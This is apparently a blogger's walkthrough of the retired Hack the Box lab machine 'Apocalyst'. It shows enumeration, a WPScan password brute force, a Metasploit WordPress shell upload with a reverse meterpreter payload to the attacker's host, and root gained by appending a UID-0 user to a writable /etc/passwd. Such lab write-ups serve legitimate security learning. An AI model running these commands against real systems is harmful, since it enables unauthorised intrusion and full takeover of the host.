Apocalyst: Retired 25 Nov 2017
If you are interested in learning more about penetration testing, Hack the Box is a great way to get your feet wet in a legal and well built environment. Head over to hackthebox.eu to get started.
Using Sparta, I ran a staged NMAP scan against the target host:
10.10.10.46. This scan revealed two open ports:
Port 22 - SSH
OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
This is expected and nothing about this indicated that this would be a useful exploit path.
Port 80 - HTTP
Apache httpd 2.4.18 ((Ubuntu))
Browsing to the site reveals a Wordpress blog about apocalypse preparation but does not seem to display correctly. Clicking on any of the links takes you to a
apcoalyst.htb domain that does not resolve properly. Updating the
/etc/hosts file to resolve
apcoalyst.htb domain to
10.10.10.46 quickly solved that problem. Initial inspection with
WPScan showed that the blog is fairly up to date (version 4.8) with no major vulnerabilities to exploit.
Initial enumeration of the blog posts shows that the path syntax for the posts is
<number> corresponds to the post number. Using Burp intruder to enumerate all post numbers from 0-20 did not reveal any "hidden" posts but confirmed the existence of the posts linked from the homepage.
Accessing the login page and using the author name from the posts mentioned above confirms that user
falaraki is a valid user. Simple password brute force of common passwords was not successful.
The next step was to conduct some directory brute forcing using
wfuzz -c --follow --hc 404 -z file,/usr/share/wordlists/wfuzz/general/medium.txt http://10.10.10.46/FUZZ
This revealed a large number of valid directories. All of the directories seemed to simply load an image (
image.jpg) that are all the same. Suspecting that these images meant something and that there might be a distinguishing factor, I decided to use a more specific wordlist for the directory brute force by using
cewl. Using the CO2 Burp extension that contains the
Cewler utility, I generated a new word list of 577 words.
Using this wordlist, I made a little Bash script to grab the image file from all the valid directories.
cat wordlist | xargs -I % wget 10.10.10.46/%/image.jpg -O %-image.jpg
Looking at all of the returned files, they all seem to be identical with a size of
207552 bytes. 'Greping' out all of the files of that size, revealed the special file in the directory
Rightiousness. Additional, looking at the source for this page reveals a comment that says
needle so looking at the returns from the directory brute force tool would have also indicated a page of different length than all the others.
ls -al *.jpg | grep -v 207552
Suspecting some form of steganography, I used
steghide to try to extract the contents. After hours of trying to figure out the password to the stego file, I finally stumbled upon the fact that there was NO password and discovered the hidden
steghide --extract -sf Rightiousness.jpg
list.txt files as a new word list I tried both another directory brute force and a password brute force on the
falaraki user. The password brute force using WPScan revealed a successful user/password combo of
wpscan --url http://10.10.10.46 --wordlist list.txt --username falaraki
With admin access to the Wordpress site, the next obvious step was to generate a malicious payload to get shell access to the host. This is simply using Metasploit.
use exploit/unix/webapp/wp_admin_shell_upload set payload php/meterpreter/reverse_tcp set password Transclisiation set rhost 10.10.10.46 set username falaraki set lhost 10.10.xx.xx set lport 443
The shell triggered immediately and I had access at the
www-data user. Browsing to
/home/falaraki revealed no only the user hash for credit but also a
.secret file that appeared to be base64 encoded. Decoding the file using
cat .secret | base64 -d revealed a message and a password.
Suspecting that the user might also have used this password as their SSH login, I tried this combo to login to the host directly successfully giving me more stable low-privilege access to the host.
Using a common Linux enumeration script (https://github.com/rebootuser/LinEnum) I immediately noticed that the
passwd file was world-writable.
Recalling other challenges with a similar vulnerability, I was able to quickly gain root access by appending the
passwd file with my own root level user due the fact that the Linux system will read additional suers of the same ID but a different username from
/etc/passwd. See this Stack Exchange question for more details: https://security.stackexchange.com/questions/151700/privilege-escalation-using-passwd-file.
perl -le 'print crypt("thisisonlyatest", "aa")' echo "gl0b0:aa9RPMhupm.dU:0:0:root:/root:/bin/bash" >> passwd su gl0b0 thisisonlyatest
Logging in as my newly created user yielded Root access and full compromise of the box.
What I Learned
- Enumeration is key and when enumeration does not seem like it is enough, try to use the information you have directly from the source to aid enumeration (Cewl).
- ALWAYS try to access with no password, people are silly sometimes. This would have saved me HOURS of time trying to brute force passwords, specifically on the stego portion.
- I had forgotten that when appending to
/etc/passwdthe appended lines must have unique usernames, that ID is what will yield root level access. I had attempted to write a new
rootline and was not successful until I remembered this.